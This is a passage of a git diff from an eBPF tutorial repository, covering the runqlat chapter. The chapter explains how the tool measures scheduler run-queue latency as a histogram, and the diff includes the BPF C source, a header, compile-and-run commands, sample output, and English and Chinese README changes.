function is used to record the timestamp when a process is enqueued. It takes the `tgid` and `pid` values as parameters. If the `pid` value is 0 or the `targ_tgid` value is not 0 and not equal to `tgid`, the function returns 0. Otherwise, it retrieves the current timestamp using `bpf_ktime_get_ns` and updates the `start` map with the `pid` key and the timestamp value. ```c static int trace_enqueue(u32 tgid, u32 pid) @@ -287,7 +282,7 @@ static int trace_enqueue(u32 tgid, u32 pid) } ``` -pid_namespace 函数用于获取进程所属的 PID namespace: +- `pid_namespace`: This function is used to get the PID namespace of a process. It takes a `task_struct` pointer as a parameter and returns the PID namespace of the process. The function retrieves the PID namespace by following `task_active_pid_ns()` and `pid->numbers[pid->level].ns`. ```c static unsigned int pid_namespace(struct task_struct *task) @@ -309,7 +304,7 @@ static unsigned int pid_namespace(struct task_struct *task) } ``` -handle_switch 函数是核心部分,用于处理调度切换事件,计算进程调度延迟并更新直方图数据: +The `handle_switch` function is the core part, used to handle scheduling switch events, calculate process scheduling latency, and update histogram data: ```c static int handle_switch(bool preempt, struct task_struct *prev, struct task_struct *next) @@ -318,27 +313,27 @@ static int handle_switch(bool preempt, struct task_struct *prev, struct task_str } ``` -首先,函数根据 filter_cg 的设置判断是否需要过滤 cgroup。然后,如果之前的进程状态为 TASK_RUNNING,则调用 trace_enqueue 函数记录进程的入队时间。接着,函数查找下一个进程的入队时间戳,如果找不到,直接返回。计算调度延迟(delta),并根据不同的选项设置(targ_per_process,targ_per_thread,targ_per_pidns),确定直方图映射的键(hkey)。然后查找或初始化直方图映射,更新直方图数据,最后删除进程的入队时间戳记录。 +Firstly, the function determines whether to filter cgroup based on the setting of `filter_cg`. Then, if the previous process state is `TASK_RUNNING`, the `trace_enqueue` function is called to record the enqueue time of the process. Then, the function looks up the enqueue timestamp of the next process. If it is not found, it returns directly. The scheduling latency (delta) is calculated, and the key for the histogram map (hkey) is determined based on different options (targ_per_process, targ_per_thread, targ_per_pidns). Then, the histogram map is looked up or initialized, and the histogram data is updated. Finally, the enqueue timestamp record of the process is deleted. -接下来是 eBPF 程序的入口点。程序使用三个入口点来捕获不同的调度事件: +Next is the entry point of the eBPF program. The program uses three entry points to capture different scheduling events: -- handle_sched_wakeup:用于处理 sched_wakeup 事件,当一个进程从睡眠状态被唤醒时触发。 -- handle_sched_wakeup_new:用于处理 sched_wakeup_new 事件,当一个新创建的进程被唤醒时触发。 -- handle_sched_switch:用于处理 sched_switch 事件,当调度器选择一个新的进程运行时触发。 +- `handle_sched_wakeup`: Used to handle the `sched_wakeup` event triggered when a process is woken up from sleep state. +- `handle_sched_wakeup_new`: Used to handle the `sched_wakeup_new` event triggered when a newly created process is woken up. +- `handle_sched_switch`: Used to handle the `sched_switch` event triggered when the scheduler selects a new process to run. -这些入口点分别处理不同的调度事件,但都会调用 handle_switch 函数来计算进程的调度延迟并更新直方图数据。 +These entry points handle different scheduling events, but all call the `handle_switch` function to calculate the scheduling latency of the process and update the histogram data. -最后,程序包含一个许可证声明: +Finally, the program includes a license declaration: ```c char LICENSE[] SEC("license") = "GPL"; ``` -这一声明指定了 eBPF 程序的许可证类型,这里使用的是 "GPL"。这对于许多内核功能是必需的,因为它们要求 eBPF 程序遵循 GPL 许可证。 +This declaration specifies the license type of the eBPF program, which is "GPL" in this case. This is required for many kernel features as they require eBPF programs to follow the GPL license. ### runqlat.h -然后我们需要定义一个头文件`runqlat.h`,用来给用户态处理从内核态上报的事件: +Next, we need to define a header file `runqlat.h` for handling events reported from kernel mode to user mode: ```c /* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ @@ -349,16 +344,16 @@ char LICENSE[] SEC("license") = "GPL"; #define MAX_SLOTS 26 struct hist { - __u32 slots[MAX_SLOTS]; - char comm[TASK_COMM_LEN]; + __u32 slots[MAX_SLOTS]; + char comm[TASK_COMM_LEN]; }; #endif /* __RUNQLAT_H */ ``` -## 编译运行 +## Compilation and Execution -eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 +We will use `eunomia-bpf` to compile and run this example. You can refer to to download and install the `ecc` compilation toolkit and `ecli` runtime. Compile: @@ -366,7 +361,7 @@ Compile: docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest ``` -或者 +or ```console $ ecc runqlat.bpf.c runqlat.h @@ -384,18 +379,15 @@ Usage: runqlat_bpf [--help] [--version] [--verbose] [--filter_cg] [--targ_per_pr A simple eBPF program Optional arguments: - -h, --help shows help message and exits - -v, --version prints version information and exits - --verbose prints libbpf debug information - --filter_cg set value of bool variable filter_cg - --targ_per_process set value of bool variable targ_per_process - --targ_per_thread set value of bool variable targ_per_thread - --targ_per_pidns set value of bool variable targ_per_pidns - --targ_ms set value of bool variable targ_ms - --targ_tgid set value of pid_t variable targ_tgid - -Built with eunomia-bpf framework. -See https://github.com/eunomia-bpf/eunomia-bpf for more information. +-h, --help shows help message and exits +-v, --version prints version information and exits +--verbose prints libbpf debug information +--filter_cg set value of bool variable filter_cg +--targ_per_process set value of bool variable targ_per_process +--targ_per_thread set value of bool variable targ_per_thread +--targ_per_pidns set value of bool variable targ_per_pidns +--targ_ms set value of bool variable targ_ms +--targ_tgid set value of pid_t variable targ_tgid $ sudo ecli run examples/bpftools/runqlat/package.json key = 4294967295 @@ -419,7 +411,7 @@ comm = rcu_preempt 16384 -> 32767 : 1 | | $ sudo ecli run examples/bpftools/runqlat/package.json --targ_per_process -key = 3189 +key = 3189 comm = cpptools (unit) : count distribution @@ -431,19 +423,20 @@ comm = cpptools 32 -> 63 : 11 |****************************************| 64 -> 127 : 8 |***************************** | 128 -> 255 : 3 |********** | + ``` -完整源代码请见: +Complete source code can be found at: -参考资料: +References: - - -## 总结 +## Summary -runqlat 是一个 Linux 内核 BPF 程序,通过柱状图来总结调度程序运行队列延迟,显示任务等待运行在 CPU 上的时间长度。编译这个程序可以使用 ecc 工具,运行时可以使用 ecli 命令。 +runqlat is a Linux kernel BPF program that summarizes scheduler run queue latency using a bar chart to show the length of time tasks wait to run on a CPU. To compile this program, you can use the `ecc` tool and to run it, you can use the `ecli` command. -runqlat 是一种用于监控Linux内核中进程调度延迟的工具。它可以帮助您了解进程在内核中等待执行的时间,并根据这些信息优化进程调度,提高系统的性能。可以在 libbpf-tools 中找到最初的源代码: +runqlat is a tool for monitoring process scheduling latency in the Linux kernel. It can help you understand the time processes spend waiting to run in the kernel and optimize process scheduling based on this information to improve system performance. The original source code can be found in libbpf-tools: -如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website for more examples and complete tutorials. diff --git a/src/9-runqlat/README.zh.md b/src/9-runqlat/README.zh.md new file mode 100755 index 0000000..812b1f7 --- /dev/null +++ b/src/9-runqlat/README.zh.md @@ -0,0 +1,449 @@ +# eBPF 入门开发实践教程九:捕获进程调度延迟,以直方图方式记录 + +eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 + +runqlat 是一个 eBPF 工具,用于分析 Linux 系统的调度性能。具体来说,runqlat 用于测量一个任务在被调度到 CPU 上运行之前在运行队列中等待的时间。这些信息对于识别性能瓶颈和提高 Linux 内核调度算法的整体效率非常有用。 + +## runqlat 原理 + +本教程是 eBPF 入门开发实践系列的第九部分,主题是 "捕获进程调度延迟"。在此,我们将介绍一个名为 runqlat 的程序,其作用是以直方图的形式记录进程调度延迟。 + +Linux 操作系统使用进程来执行所有的系统和用户任务。这些进程可能被阻塞、杀死、运行,或者正在等待运行。处在后两种状态的进程数量决定了 CPU 运行队列的长度。 + +进程有几种可能的状态,如: + +- 可运行或正在运行 +- 可中断睡眠 +- 不可中断睡眠 +- 停止 +- 僵尸进程 + +等待资源或其他函数信号的进程会处在可中断或不可中断的睡眠状态:进程被置入睡眠状态,直到它需要的资源变得可用。然后,根据睡眠的类型,进程可以转移到可运行状态,或者保持睡眠。 + +即使进程拥有它需要的所有资源,它也不会立即开始运行。它会转移到可运行状态,与其他处在相同状态的进程一起排队。CPU可以在接下来的几秒钟或毫秒内执行这些进程。调度器为 CPU 排列进程,并决定下一个要执行的进程。 + +根据系统的硬件配置,这个可运行队列(称为 CPU 运行队列)的长度可以短也可以长。短的运行队列长度表示 CPU 没有被充分利用。另一方面,如果运行队列长,那么可能意味着 CPU 不够强大,无法执行所有的进程,或者 CPU 的核心数量不足。在理想的 CPU 利用率下,运行队列的长度将等于系统中的核心数量。 + +进程调度延迟,也被称为 "run queue latency",是衡量线程从变得可运行(例如,接收到中断,促使其处理更多工作)到实际在 CPU 上运行的时间。在 CPU 饱和的情况下,你可以想象线程必须等待其轮次。但在其他奇特的场景中,这也可能发生,而且在某些情况下,它可以通过调优减少,从而提高整个系统的性能。 + +我们将通过一个示例来阐述如何使用 runqlat 工具。这是一个负载非常重的系统: + +```shell +# runqlat +Tracing run queue latency... Hit Ctrl-C to end. +^C + usecs : count distribution + 0 -> 1 : 233 |*********** | + 2 -> 3 : 742 |************************************ | + 4 -> 7 : 203 |********** | + 8 -> 15 : 173 |******** | + 16 -> 31 : 24 |* | + 32 -> 63 : 0 | | + 64 -> 127 : 30 |* | + 128 -> 255 : 6 | | + 256 -> 511 : 3 | | + 512 -> 1023 : 5 | | + 1024 -> 2047 : 27 |* | + 2048 -> 4095 : 30 |* | + 4096 -> 8191 : 20 | | + 8192 -> 16383 : 29 |* | + 16384 -> 32767 : 809 |****************************************| + 32768 -> 65535 : 64 |*** | +``` + +在这个输出中,我们看到了一个双模分布,一个模在0到15微秒之间,另一个模在16到65毫秒之间。这些模式在分布(它仅仅是 "count" 列的视觉表示)中显示为尖峰。例如,读取一行:在追踪过程中,809个事件落入了16384到32767微秒的范围(16到32毫秒)。 + +在后续的教程中,我们将深入探讨如何利用 eBPF 对此类指标进行深度跟踪和分析,以更好地理解和优化系统性能。同时,我们也将学习更多关于 Linux 内核调度器、中断处理和 CPU 饱 + +runqlat 的实现利用了 eBPF 程序,它通过内核跟踪点和函数探针来测量进程在运行队列中的时间。当进程被排队时,trace_enqueue 函数会在一个映射中记录时间戳。当进程被调度到 CPU 上运行时,handle_switch 函数会检索时间戳,并计算当前时间与排队时间之间的时间差。这个差值(或 delta)被用于更新进程的直方图,该直方图记录运行队列延迟的分布。该直方图可用于分析 Linux 内核的调度性能。 + +## runqlat 代码实现 + +### runqlat.bpf.c + +首先我们需要编写一个源代码文件 runqlat.bpf.c: + +```c +// SPDX-License-Identifier: GPL-2.0 +// Copyright (c) 2020 Wenbo Zhang +#include +#include +#include +#include +#include "runqlat.h" +#include "bits.bpf.h" +#include "maps.bpf.h" +#include "core_fixes.bpf.h" + +#define MAX_ENTRIES 10240 +#define TASK_RUNNING 0 + +const volatile bool filter_cg = false; +const volatile bool targ_per_process = false; +const volatile bool targ_per_thread = false; +const volatile bool targ_per_pidns = false; +const volatile bool targ_ms = false; +const volatile pid_t targ_tgid = 0; + +struct { + __uint(type, BPF_MAP_TYPE_CGROUP_ARRAY); + __type(key, u32); + __type(value, u32); + __uint(max_entries, 1); +} cgroup_map SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, MAX_ENTRIES); + __type(key, u32); + __type(value, u64); +} start SEC(".maps"); + +static struct hist zero; + +/// @sample {"interval": 1000, "type" : "log2_hist"} +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, MAX_ENTRIES); + __type(key, u32); + __type(value, struct hist); +} hists SEC(".maps"); + +static int trace_enqueue(u32 tgid, u32 pid) +{ + u64 ts; + + if (!pid) + return 0; + if (targ_tgid && targ_tgid != tgid) + return 0; + + ts = bpf_ktime_get_ns(); + bpf_map_update_elem(&start, &pid, &ts, BPF_ANY); + return 0; +} + +static unsigned int pid_namespace(struct task_struct *task) +{ + struct pid *pid; + unsigned int level; + struct upid upid; + unsigned int inum; + + /* get the pid namespace by following task_active_pid_ns(), + * pid->numbers[pid->level].ns + */ + pid = BPF_CORE_READ(task, thread_pid); + level = BPF_CORE_READ(pid, level); + bpf_core_read(&upid, sizeof(upid), &pid->numbers[level]); + inum = BPF_CORE_READ(upid.ns, ns.inum); + + return inum; +} + +static int handle_switch(bool preempt, struct task_struct *prev, struct task_struct *next) +{ + struct hist *histp; + u64 *tsp, slot; + u32 pid, hkey; + s64 delta; + + if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) + return 0; + + if (get_task_state(prev) == TASK_RUNNING) + trace_enqueue(BPF_CORE_READ(prev, tgid), BPF_CORE_READ(prev, pid)); + + pid = BPF_CORE_READ(next, pid); + + tsp = bpf_map_lookup_elem(&start, &pid); + if (!tsp) + return 0; + delta = bpf_ktime_get_ns() - *tsp; + if (delta < 0) + goto cleanup; + + if (targ_per_process) + hkey = BPF_CORE_READ(next, tgid); + else if (targ_per_thread) + hkey = pid; + else if (targ_per_pidns) + hkey = pid_namespace(next); + else + hkey = -1; + histp = bpf_map_lookup_or_try_init(&hists, &hkey, &zero); + if (!histp) + goto cleanup; + if (!histp->comm[0]) + bpf_probe_read_kernel_str(&histp->comm, sizeof(histp->comm), + next->comm); + if (targ_ms) + delta /= 1000000U; + else + delta /= 1000U; + slot = log2l(delta); + if (slot >= MAX_SLOTS) + slot = MAX_SLOTS - 1; + __sync_fetch_and_add(&histp->slots[slot], 1); + +cleanup: + bpf_map_delete_elem(&start, &pid); + return 0; +} + +SEC("raw_tp/sched_wakeup") +int BPF_PROG(handle_sched_wakeup, struct task_struct *p) +{ + if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) + return 0; + + return trace_enqueue(BPF_CORE_READ(p, tgid), BPF_CORE_READ(p, pid)); +} + +SEC("raw_tp/sched_wakeup_new") +int BPF_PROG(handle_sched_wakeup_new, struct task_struct *p) +{ + if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) + return 0; + + return trace_enqueue(BPF_CORE_READ(p, tgid), BPF_CORE_READ(p, pid)); +} + +SEC("raw_tp/sched_switch") +int BPF_PROG(handle_sched_switch, bool preempt, struct task_struct *prev, struct task_struct *next) +{ + return handle_switch(preempt, prev, next); +} + +char LICENSE[] SEC("license") = "GPL"; +``` + +这其中定义了一些常量和全局变量,用于过滤对应的追踪目标: + +```c +#define MAX_ENTRIES 10240 +#define TASK_RUNNING 0 + +const volatile bool filter_cg = false; +const volatile bool targ_per_process = false; +const volatile bool targ_per_thread = false; +const volatile bool targ_per_pidns = false; +const volatile bool targ_ms = false; +const volatile pid_t targ_tgid = 0; +``` + +这些变量包括最大映射项数量、任务状态、过滤选项和目标选项。这些选项可以通过用户空间程序设置,以定制 eBPF 程序的行为。 + +接下来,定义了一些 eBPF 映射: + +```c +struct { + __uint(type, BPF_MAP_TYPE_CGROUP_ARRAY); + __type(key, u32); + __type(value, u32); + __uint(max_entries, 1); +} cgroup_map SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, MAX_ENTRIES); + __type(key, u32); + __type(value, u64); +} start SEC(".maps"); + +static struct hist zero; + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, MAX_ENTRIES); + __type(key, u32); + __type(value, struct hist); +} hists SEC(".maps"); +``` + +这些映射包括: + +- cgroup_map 用于过滤 cgroup; +- start 用于存储进程入队时的时间戳; +- hists 用于存储直方图数据,记录进程调度延迟。 + +接下来是一些辅助函数: + +trace_enqueue 函数用于在进程入队时记录其时间戳: + +```c +static int trace_enqueue(u32 tgid, u32 pid) +{ + u64 ts; + + if (!pid) + return 0; + if (targ_tgid && targ_tgid != tgid) + return 0; + + ts = bpf_ktime_get_ns(); + bpf_map_update_elem(&start, &pid, &ts, BPF_ANY); + return 0; +} +``` + +pid_namespace 函数用于获取进程所属的 PID namespace: + +```c +static unsigned int pid_namespace(struct task_struct *task) +{ + struct pid *pid; + unsigned int level; + struct upid upid; + unsigned int inum; + + /* get the pid namespace by following task_active_pid_ns(), + * pid->numbers[pid->level].ns + */ + pid = BPF_CORE_READ(task, thread_pid); + level = BPF_CORE_READ(pid, level); + bpf_core_read(&upid, sizeof(upid), &pid->numbers[level]); + inum = BPF_CORE_READ(upid.ns, ns.inum); + + return inum; +} +``` + +handle_switch 函数是核心部分,用于处理调度切换事件,计算进程调度延迟并更新直方图数据: + +```c +static int handle_switch(bool preempt, struct task_struct *prev, struct task_struct *next) +{ + ... +} +``` + +首先,函数根据 filter_cg 的设置判断是否需要过滤 cgroup。然后,如果之前的进程状态为 TASK_RUNNING,则调用 trace_enqueue 函数记录进程的入队时间。接着,函数查找下一个进程的入队时间戳,如果找不到,直接返回。计算调度延迟(delta),并根据不同的选项设置(targ_per_process,targ_per_thread,targ_per_pidns),确定直方图映射的键(hkey)。然后查找或初始化直方图映射,更新直方图数据,最后删除进程的入队时间戳记录。 + +接下来是 eBPF 程序的入口点。程序使用三个入口点来捕获不同的调度事件: + +- handle_sched_wakeup:用于处理 sched_wakeup 事件,当一个进程从睡眠状态被唤醒时触发。 +- handle_sched_wakeup_new:用于处理 sched_wakeup_new 事件,当一个新创建的进程被唤醒时触发。 +- handle_sched_switch:用于处理 sched_switch 事件,当调度器选择一个新的进程运行时触发。 + +这些入口点分别处理不同的调度事件,但都会调用 handle_switch 函数来计算进程的调度延迟并更新直方图数据。 + +最后,程序包含一个许可证声明: + +```c +char LICENSE[] SEC("license") = "GPL"; +``` + +这一声明指定了 eBPF 程序的许可证类型,这里使用的是 "GPL"。这对于许多内核功能是必需的,因为它们要求 eBPF 程序遵循 GPL 许可证。 + +### runqlat.h + +然后我们需要定义一个头文件`runqlat.h`,用来给用户态处理从内核态上报的事件: + +```c +/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ +#ifndef __RUNQLAT_H +#define __RUNQLAT_H + +#define TASK_COMM_LEN 16 +#define MAX_SLOTS 26 + +struct hist { + __u32 slots[MAX_SLOTS]; + char comm[TASK_COMM_LEN]; +}; + +#endif /* __RUNQLAT_H */ +``` + +## 编译运行 + +eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 + +Compile: + +```shell +docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest +``` + +或者 + +```console +$ ecc runqlat.bpf.c runqlat.h +Compiling bpf object... +Generating export types... +Packing ebpf object and config into package.json... +``` + +Run: + +```console +$ sudo ecli run examples/bpftools/runqlat/package.json -h +Usage: runqlat_bpf [--help] [--version] [--verbose] [--filter_cg] [--targ_per_process] [--targ_per_thread] [--targ_per_pidns] [--targ_ms] [--targ_tgid VAR] + +A simple eBPF program + +Optional arguments: + -h, --help shows help message and exits + -v, --version prints version information and exits + --verbose prints libbpf debug information + --filter_cg set value of bool variable filter_cg + --targ_per_process set value of bool variable targ_per_process + --targ_per_thread set value of bool variable targ_per_thread + --targ_per_pidns set value of bool variable targ_per_pidns + --targ_ms set value of bool variable targ_ms + --targ_tgid set value of pid_t variable targ_tgid + +Built with eunomia-bpf framework. +See https://github.com/eunomia-bpf/eunomia-bpf for more information. + +$ sudo ecli run examples/bpftools/runqlat/package.json +key = 4294967295 +comm = rcu_preempt + + (unit) : count distribution + 0 -> 1 : 9 |**** | + 2 -> 3 : 6 |** | + 4 -> 7 : 12 |***** | + 8 -> 15 : 28 |************* | + 16 -> 31 : 40 |******************* | + 32 -> 63 : 83 |****************************************| + 64 -> 127 : 57 |*************************** | + 128 -> 255 : 19 |********* | + 256 -> 511 : 11 |***** | + 512 -> 1023 : 2 | | + 1024 -> 2047 : 2 | | + 2048 -> 4095 : 0 | | + 4096 -> 8191 : 0 | | + 8192 -> 16383 : 0 | | + 16384 -> 32767 : 1 | | + +$ sudo ecli run examples/bpftools/runqlat/package.json --targ_per_process +key = 3189 +comm = cpptools + + (unit) : count distribution + 0 -> 1 : 0 | | + 2 -> 3 : 0 | | + 4 -> 7 : 0 | | + 8 -> 15 : 1 |*** | + 16 -> 31 : 2 |******* | + 32 -> 63 : 11 |****************************************| + 64 -> 127 : 8 |***************************** | + 128 -> 255 : 3 |********** | +``` + +完整源代码请见: + +参考资料: + +- +- + +## 总结 + +runqlat 是一个 Linux 内核 BPF 程序,通过柱状图来总结调度程序运行队列延迟,显示任务等待运行在 CPU 上的时间长度。编译这个程序可以使用 ecc 工具,运行时可以使用 ecli 命令。 + +runqlat 是一种用于监控Linux内核中进程调度延迟的工具。它可以帮助您了解进程在内核中等待执行的时间,并根据这些信息优化进程调度,提高系统的性能。可以在 libbpf-tools 中找到最初的源代码: + +如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 diff --git a/src/9-runqlat/README_en.md b/src/9-runqlat/README_en.md deleted file mode 100755 index ffd3377..0000000 --- a/src/9-runqlat/README_en.md +++ /dev/null @@ -1,442 +0,0 @@ -# eBPF Tutorial by Example 9: Capturing Scheduling Latency and Recording as Histogram - -eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code at runtime. - -runqlat is an eBPF tool used for analyzing the scheduling performance of the Linux system. Specifically, runqlat is used to measure the time a task waits in the run queue before being scheduled to run on a CPU. This information is very useful for identifying performance bottlenecks and improving the overall efficiency of the Linux kernel scheduling algorithm. - -## runqlat Principle - -This tutorial is the ninth part of the eBPF beginner's development series, with the topic "Capturing Process Scheduling Latency". Here, we will introduce a program called runqlat, which records process scheduling latency as a histogram. - -The Linux operating system uses processes to execute all system and user tasks. These processes can be blocked, killed, running, or waiting to run. The number of processes in the latter two states determines the length of the CPU run queue. - -Processes can have several possible states, such as: - -- Runnable or running -- Interruptible sleep -- Uninterruptible sleep -- Stopped -- Zombie process - -Processes waiting for resources or other function signals are in the interruptible or uninterruptible sleep state: the process is put to sleep until the resource it needs becomes available. Then, depending on the type of sleep, the process can transition to the runnable state or remain asleep. - -Even when a process has all the resources it needs, it does not start running immediately. It transitions to the runnable state and is queued together with other processes in the same state. The CPU can execute these processes in the next few seconds or milliseconds. The scheduler arranges the processes for the CPU and determines the next process to run. - -Depending on the hardware configuration of the system, the length of this runnable queue (known as the CPU run queue) can be short or long. A short run queue length indicates that the CPU is not being fully utilized. On the other hand, if the run queue is long, it may mean that the CPU is not powerful enough to handle all the processes or that the number of CPU cores is insufficient. In an ideal CPU utilization, the length of the run queue will be equal to the number of cores in the system. - -Process scheduling latency, also known as "run queue latency," is the time it takes for a thread to go from becoming runnable (e.g., receiving an interrupt that prompts it to do more work) to actually running on the CPU. In the case of CPU saturation, you can imagine that the thread has to wait for its turn. But in other peculiar scenarios, this can also happen, and in some cases, it can be reduced by tuning to improve the overall system performance. - -We will illustrate how to use the runqlat tool through an example. This is a heavily loaded system: - -```shell -# runqlat -Tracing run queue latency... Hit Ctrl-C to end. -^C - usecs : count distribution - 0 -> 1 : 233 |*********** | - 2 -> 3 : 742 |************************************ | - 4 -> 7 : 203 |********** | - 8 -> 15 : 173 |******** | - 16 -> 31 : 24 |* | - 32 -> 63 : 0 | | - 64 -> 127 : 30 |* | - 128 -> 255 : 6 | | - 256 -> 511 : 3 | | - 512 -> 1023 : 5 | | - 1024 -> 2047 : 27 |* | -``` - -## runqlat Code Implementation - -### runqlat.bpf.c - -First, we need to write a source code file `runqlat.bpf.c`: - -```c -// SPDX-License-Identifier: GPL-2.0 -// Copyright (c) 2020 Wenbo Zhang -#include -#include -#include -#include -#include "runqlat.h" -#include "bits.bpf.h" -#include "maps.bpf.h" -#include "core_fixes.bpf.h" - -#define MAX_ENTRIES 10240 -#define TASK_RUNNING 0 - -const volatile bool filter_cg = false; -const volatile bool targ_per_process = false; -const volatile bool targ_per_thread = false; -const volatile bool targ_per_pidns = false; -const volatile bool targ_ms = false; -const volatile pid_t targ_tgid = 0; - -struct { - __uint(type, BPF_MAP_TYPE_CGROUP_ARRAY); - __type(key, u32); - __type(value, u32); - __uint(max_entries, 1); -} cgroup_map SEC(".maps"); - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, MAX_ENTRIES); - __type(key, u32); - __type(value, u64); -} start SEC(".maps"); - -static struct hist zero; - -/// @sample {"interval": 1000, "type" : "log2_hist"} -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, MAX_ENTRIES); - __type(key, u32); - __type(value, struct hist); -} hists SEC(".maps"); - -static int trace_enqueue(u32 tgid, u32 pid) -{ -u64 ts; - -if (!pid) - return 0; -if (targ_tgid && targ_tgid != tgid) - return 0; - -ts = bpf_ktime_get_ns(); -bpf_map_update_elem(&start, &pid, &ts, BPF_ANY); -return 0; -} - -static unsigned int pid_namespace(struct task_struct *task) -{ -struct pid *pid; -unsigned int level; -struct upid upid; -unsigned int inum; - -/* get the pid namespace by following task_active_pid_ns(), - * pid->numbers[pid->level].ns - */ -pid = BPF_CORE_READ(task, thread_pid); -level = BPF_CORE_READ(pid, level); -bpf_core_read(&upid, sizeof(upid), &pid->numbers[level]); -inum = BPF_CORE_READ(upid.ns, ns.inum); - -return inum; -} - -static int handle_switch(bool preempt, struct task_struct *prev, struct task_struct *next) -{ -struct hist *histp; -u64 *tsp, slot; -u32 pid, hkey; -s64 delta; - -if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) - return 0; - -if (get_task_state(prev) == TASK_RUNNING) - trace_enqueue(BPF_CORE_READ(prev, tgid), BPF_CORE_READ(prev, pid)); - -pid = BPF_CORE_READ(next, pid); - -tsp = bpf_map_lookup_elem(&start, &pid); -if (!tsp) - return 0; -delta = bpf_ktime_get_ns() - *tsp; -if (delta < 0) - goto cleanup; - -if (targ_per_process) - hkey = BPF_CORE_READ(next, tgid); -else if (targ_per_thread) - hkey = pid; -else if (targ_per_pidns) - hkey = pid_namespace(next); -else - hkey = -1; -histp = bpf_map_lookup_or_try_init(&hists, &hkey, &zero); -if (!histp) - goto cleanup; -if (!histp->comm[0]) - bpf_probe_read_kernel_str(&histp->comm, sizeof(histp->comm), - next->comm); -if (targ_ms) - delta /= 1000000U; -else - delta /= 1000U; -slot = log2l(delta); -if (slot >= MAX_SLOTS) - slot = MAX_SLOTS - 1; -__sync_fetch_and_add(&histp->slots[slot], 1); - -cleanup: -bpf_map_delete_elem(&start, &pid); -return 0; -} - -SEC("raw_tp/sched_wakeup") -int BPF_PROG(handle_sched_wakeup, struct task_struct *p) -{ - if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) - return 0; - - return trace_enqueue(BPF_CORE_READ(p, tgid), BPF_CORE_READ(p, pid)); -} - -SEC("raw_tp/sched_wakeup_new") -int BPF_PROG(handle_sched_wakeup_new, struct task_struct *p) -{ - if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) - return 0; - - return trace_enqueue(BPF_CORE_READ(p, tgid), BPF_CORE_READ(p, pid)); -} - -SEC("raw_tp/sched_switch") -int BPF_PROG(handle_sched_switch, bool preempt, struct task_struct *prev, struct task_struct *next) -{ - return handle_switch(preempt, prev, next); -} - -char LICENSE[] SEC("license") = "GPL"; -``` - -#### Constants and Global Variables - -The code defines several constants and volatile global variables used for filtering corresponding tracing targets. These variables include: - -```c -#define MAX_ENTRIES 10240 -#define TASK_RUNNING 0 - -const volatile bool filter_cg = false; -const volatile bool targ_per_process = false; -const volatile bool targ_per_thread = false; -const volatile bool targ_per_pidns = false; -const volatile bool targ_ms = false; -const volatile pid_t targ_tgid = 0; -``` - -- `MAX_ENTRIES`: The maximum number of map entries. -- `TASK_RUNNING`: The task status value. -- `filter_cg`, `targ_per_process`, `targ_per_thread`, `targ_per_pidns`, `targ_ms`, `targ_tgid`: Boolean variables for filtering and target options. These options can be set by user-space programs to customize the behavior of the eBPF program. - -#### eBPF Maps - -The code defines several eBPF maps including: - -```c -struct { - __uint(type, BPF_MAP_TYPE_CGROUP_ARRAY); - __type(key, u32); - __type(value, u32); - __uint(max_entries, 1); -} cgroup_map SEC(".maps"); - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, MAX_ENTRIES); - __type(key, u32); - __type(value, u64); -} start SEC(".maps"); - -static struct hist zero; - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, MAX_ENTRIES); - __type(key, u32); - __type(value, struct hist); -} hists SEC(".maps"); -``` - -- `cgroup_map`: A cgroup array map used for filtering cgroups. -- `start`: A hash map used to store timestamps when processes are enqueued. -- `hists`: A hash map used to store histogram data for recording process scheduling delays. - -#### Helper Functions - -The code includes two helper functions: - -- `trace_enqueue`: This function is used to record the timestamp when a process is enqueued. It takes the `tgid` and `pid` values as parameters. If the `pid` value is 0 or the `targ_tgid` value is not 0 and not equal to `tgid`, the function returns 0. Otherwise, it retrieves the current timestamp using `bpf_ktime_get_ns` and updates the `start` map with the `pid` key and the timestamp value. - -```c -static int trace_enqueue(u32 tgid, u32 pid) -{ - u64 ts; - - if (!pid) - return 0; - if (targ_tgid && targ_tgid != tgid) - return 0; - - ts = bpf_ktime_get_ns(); - bpf_map_update_elem(&start, &pid, &ts, BPF_ANY); - return 0; -} -``` - -- `pid_namespace`: This function is used to get the PID namespace of a process. It takes a `task_struct` pointer as a parameter and returns the PID namespace of the process. The function retrieves the PID namespace by following `task_active_pid_ns()` and `pid->numbers[pid->level].ns`. - -```c -static unsigned int pid_namespace(struct 